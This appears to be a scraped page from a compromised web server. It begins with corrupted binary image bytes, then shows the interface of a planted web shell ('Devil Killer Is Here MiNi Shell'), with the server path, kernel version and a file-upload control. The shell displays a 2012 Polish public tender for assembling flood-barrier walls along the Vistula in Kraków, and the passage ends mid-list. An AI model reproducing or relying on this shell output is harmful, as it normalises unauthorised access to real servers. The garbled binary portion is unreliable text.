JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/73854-N-2012.html

<p class="kh_header"><b>Kraków: Montaż , demontaż i transport systemu ścianek rozbieralnych
przeciwpowodziowych systemu DPS na wałach wiślanych miasta Krakowa- woj. małopolskie wykonywany podczas :zagrożenia powodziowego , kontrolnie, treningowo, wraz z pozostawaniem w gotowości do podjęcia działań w latach 2012 do 2014</b><br>
<b>Numer ogłoszenia: 73854 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Montaż , demontaż i transport systemu ścianek rozbieralnych
przeciwpowodziowych systemu DPS na wałach wiślanych miasta Krakowa- woj. małopolskie wykonywany podczas :zagrożenia powodziowego , kontrolnie, treningowo, wraz z pozostawaniem w gotowości do podjęcia działań w latach 2012 do 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie prac związanych z montażem , demontażem i transportem systemu ścianek rozbieralnych , przeciwpowodziowych systemu DPS na wałach wiślanych miasta Krakowa woj. małopolskie : podczas zagrożenia powodziowego , kontrolnie, treningowo wraz z pozostawaniem w gotowości w latach 2012 do 2014 zgodnie z poszczególnymi częściami zamówienia: 


II.1.W SKŁAD PRZEDMIOTU ZAMÓWIENIA WCHODZĄ :

1.DZIAŁANIA OPERACYJNE W CZASIE POWODZI (Plan A.) 
/zgodnie z poszczególnymi częściami zamówienia obejmujące swoim zakresem/:

1.1. Załadunek i przewóz elementów rozbieralnych ścianek przeciwpowodziowych z Wojewódzkiej Bazy Przeciwpowodziowej  przy ul. Na Zakolu Wisły 12 w Krakowie do miejsca montażu.
1.2. Rozładunek, montaż, demontaż elementów rozbieralnych ścianek przeciwpowodziowych w obrębie bulwarów wiślanych m. Krakowa
1.3. Załadunek elementów rozbieralnych ścianek przeciwpowodziowych na bulwarach wiślanych miasta Krakowa oraz przewóz elementów na bazę Przeciwpowodziową przy ul. Na Zakolu Wisły 12 i rozładunek.
1.4. Wykonanie zamknięcia mostu Dębnickiego przy pomocy koszy gabionowych systemu ALGON-JATAX oraz zamknięcie workami z piaskiem lokalnego zaniżenia terenu przy ulicy Przedwiośnie.
1.5. Załadunek i przewóz zamknięć do bram przeciwpowodziowych z Wojewódzkiej Bazy Przeciwpowodziowej  przy ul. Na Zakolu Wisły 12 w Krakowie do miejsca montażu ( bramy powodziowe przy 
ul. Wioślarskiej, Flisackiej, Dojazdowej i Włóczków)
1.6. Rozładunek, montaż, demontaż zamknięć do bram przeciwpowodziowych 
1.7.Załadunek zamknięć do bram przeciwpowodziowych oraz przewóz elementów na bazę Przeciwpowodziową przy ul. Na Zakolu Wisły 12 i rozładunek. 

1.8.Założenie ,montaż i demontaż znaków ostrzegawczych-znaki i tablice informacyjne w sytuacji zamknięcia mostu Dębnickiego.
Transport, założenie, montaż i demontaż znaków ostrzegawczych i tablic informacyjnych zdeponowanych w magazynie MZMiUW przy ul. Na Zakolu Wisły 12 

2.DZIAŁANIA TRENINGOWE (Plan B) 
(zgodnie z poszczególnymi częściami zamówienia obejmujące swoim zakresem):

2.1.Trening montażu zamknięć 4 szt. bram powodziowych szandorami, zlokalizowanych przy ulicach: Wioślarskiej, Flisackiej, Dojazdowej i Włóczków w terminie wskazanym przez zamawiającego
2.2.Trening montażu rozbieralnego systemu przeciwpowodziowego w zakresie i terminie ustalonym przez zamawiającego w rocznym harmonogramie rzeczowo-finansowym
2.3.Trening montażu całego systemu 1 raz w ciągu dwóch lat.

3.DZIAŁANIA KONTROLNE (Plan C)
(zgodnie z poszczególnymi częściami zamówienia obejmujące swoim zakresem):

Montaż sprawdzający właściwe funkcjonowanie systemu - na polecenie organu właściwego do ogłaszania alarmu przeciwpowodziowego.

4.GOTOWOŚĆ DO PRZEPROWADZENIA DZIAŁAŃ OPERACYJNYCH
Wykonawca musi pozostawać w gotowości do przeprowadzenia działań operacyjnych wg Planu A zgodnie z poszczególnymi częściami zamówienia w każdym czasie w okresie trwania umowy zawartej w wyniku przedmiotowego postępowania.
Wykonawca rozpocznie działania niezwłocznie po wezwaniu przez organ właściwy do ogłaszania pogotowia i alarmu przeciwpowodziowego.

5.BIEŻĄCA KONTROLA KONSERWACJI I UTRZYMANIA GNIAZD DO MONTAŻU ŚCIANEK

6. JEDNORAZOWE SZKOLENIE
Przeprowadzone przez Zamawiającego dla pracowników Wykonawcy dotyczące montażu: zamknięć bram przeciwpowodziowych szandorami, rozbieralnych ścianek przeciwpowodziowych DPS, zamknięcia mostu Dębnickiego i założenia znaków ostrzegawczych i tablic informacyjnych niezbędnych w sytuacji zamknięcia mostu Dębnickiego
w 1-szych 3 miesiącach trwania umowy

7. PRZEGLĄD RAZ W ROKU: szandorów, elementów rozbieralnych ścianek przeciwpowodziowych DPS z próbnym montażem elementów pionowych wraz z jednym elementem poziomym
w 1 i 2 roku trwania umowy

8.Ładowanie i utrzymania w gotowości urządzeń zasilających oświetlenie znaków i tablic informacyjnych.

II.2.ZAMAWIAJĄCY DZIELI POWYŻSZY PRZEDMIOT ZAMÓWIENIA NA CZĘŚCI:

Oferta Częściowa nr 1
Rozwinięcie i likwidacja systemu DPS 2000 na prawym brzegu rzeki Wisły od ul. Czechosłowackiej do początku bulwaru powyżej mostu Dębnickiego

W zakres powyższej części zamówienia wchodzą zadania opisane w pkt 1.1,1.2,1.3

Oferta Częściowa nr 2
Rozwinięcie i likwidacja systemu DPS 2000 na lewym  brzegu rzeki Wisły
a/ od ujścia rz. Rudawy do mostu Dębnickiego 
b/ od mostu Dębnickiego do Wawelu
c/ pomiędzy Wawelem a mostem Grunwaldzkim
d/ pomiędzy mostem Grunwaldzkim do bulwaru przy ul. Piekarskiej

W zakres powyższej części zamówienia wchodzą zadania opisane w pkt 1.1,1.2,1.3


Oferta Częściowa nr 3
Zamknięcie i demontaż zamknięcia mostu Dębnickiego przy pomocy gabionów oraz zamknięcie workami z piaskiem i rozbiórka lokalnego obniżenia terenu przy ul. Przedwiośnie
W zakres powyższej części zamówienia wchodzą zadania opisane w pkt 1.4
Oferta Częściowa nr 4
Zamknięcie i demontaż zamknięć bram powodziowych
- przy ul. Wioślarskiej, Flisackiej, Dojazdowej i Włóczków
W zakres powyższej części zamówienia wchodzą zadania opisane w pkt 1.5,1.6,1.7


Oferta Częściowa nr 5
ZAŁOŻENIE, MONTAŻ I DEMONTAŻ ZNAKÓW OSTRZEGAWCZYCH I TABLIC INFORMACYJNYCH NIEZBĘDNYCH W SYTUACJI ZAMKNIĘCIA MOSTU DĘBNICKIEGO
W zakres powyższej części zamówienia wchodzą zadania opisane w pkt 1.8


Szczegółowy zakres przedmiotu zamówienia określa dokumentacja pn.Opracowanie planu uruchomienia i organizacji montażu rozbieralnych ścianek przeciwpowodziowych systemu DPS 2000 na wałach wiślanych w Krakowie 
A- Plan operacyjny
B- Plan treningowy
C- Plan kontrolny
Dokumentacja została opracowana w 2004 roku, wobec braku wersji elektronicznej dokumentacja do wglądu w siedzibie IR Kraków ul.Kraszewskiego 36.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.1.Wadium  
Wadium wysokości na:
 Oferta Częściowa nr 1 w wysokości 10 000 zł;
 Oferta Częściowa nr 2 w wysokości 6 000 zł.
 Oferta Częściowa nr 3 w wysokości 3 000 zł.
 Oferta Częściowa nr 4 w wysokości 3 000 zł;
Oferta Częściowa nr 5 w wysokości  3 000 zł;
należy wnieść w terminie do dnia 20.03.2012 r. do godz. 08:00
1.2.Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z   tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tj. Dz. U. Nr 42, poz. 275 z 2007 r. z późn. zmianami)
Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy zamawiającego: KREDYT BANK PBI S.A. II O  KRAKÓW nr konta 70 1500 1487 1214 8003 1851 0000.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Krakowie ul. Kraszewskiego 36 pok.29A
Dowód wpłaty wadium należy dołączyć do oferty. 
W przypadku Wykonawcy wysyłającego ofertę pocztą ze skierowaniem do złożenia w pokoju Nr 32A oraz w odrębnej kopercie wadium do złożenia w pokoju Nr 29A. 
Za formę potwierdzenia złożenia wadium zostaje uznany dokument kserokopii gwarancji (wadium) z adnotacją Wykonawcy -(za zgodność z oryginałem)oraz (oryginał gwarancji.....złożono w pok. Nr 29A)
Dowód wpłaty wadium należy dołączyć do oferty. 
1.3 Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie ul.Szlak 73
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 4a i lub  5 Ustawy.
- w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązania gwaranta (poręczyciela) z tytułów związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań określonych w art. 46 ust.4a i lub ust. 5 Ustawy każdego z tych wykonawców
- okres ważności wadium nie może być krótszy niż okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/1) wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej  1 usługę odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia ,o wartości co najmniej  200 000 zł. , w zakresie montażu i demontażu mobilnych systemów ochrony przeciwpowodziowejm.inn. systemu DPS, IBS)zabezpieczających tereny chronione  , z podaniem ich  wartości, przedmiotu, dat  wykonywania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te zostały wykonane lub są wykonywane należycie w przypadku świadczeń ciągłych lub okresowych
     (dotyczy Oferty częściowej Nr 1,2,4)
a/2) wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej  1 usługę odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia ,o wartości co najmniej  100 000 zł. 
w zakresie montażu i demontażu mobilnych systemów ochrony przeciwpowodziowej (m.inn. systemu DPS, IBS) zabezpieczających tereny chronione  lub układanie : gabionów, koszy siatkowo kamiennych  z podaniem ich  wartości, przedmiotu, dat  wykonywania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te zostały wykonane lub są wykonywane należycie w przypadku świadczeń ciągłych lub okresowych
 (dotyczy Oferty częściowej Nr 3)
a/3) wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali  co najmniej  1usługę w zakresie zabezpieczenia ruchu drogowego , odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia ,o wartości co najmniej  100 000 zł. ,z podaniem ich  wartości, przedmiotu, dat  wykonywania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te zostały wykonane lub są wykonywane należycie w przypadku świadczeń ciągłych lub okresowych
     (  dotyczy Oferty częściowej Nr 5)
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi 
do wykonania zamówienia :
 w szczególności co najmniej 2 samochody z dźwigiem //HDS/ -dotyczy Oferty częściowej Nr 1,2,3,4 
i co najmniej 1 samochód do transportu znaków ostrzegawczych i tablic informacyjnych dotyczy Oferty częściowej Nr 5

Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą ,że dysponują lub będą dysponować co najmniej 6. osobami posiadającymi kwalifikacje zawodowe konieczne do realizacji zamówienia, a w szczególności (w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm.)1. Osobę posiadającą uprawnienia o specjalności konstrukcyjno-budowlanej w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych lub  odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów     ( nie dotyczy Oferty częściowej Nr 5)lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych , która przejmie kierownictwo nad wykonaniem przedmiotu zamówienia
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli złoży opłaconą polisę ,w przypadku jej braku inny dokument potwierdzający, że
są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej                 działalności związanej z przedmiotem zamówienia (wraz z dowodem wpłaty)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2.Kosztorys ofertowy sporządzony w oparciu o planowany wykaz czynności 3. Zaakceptowany projekt umowy 4. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 5. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 6.Oświadczenie zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. 7.Oświadczenie , że nie podlega wykluczeniu na podstawie przesłanek zawartych w art 24 ust 1-2 8. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w 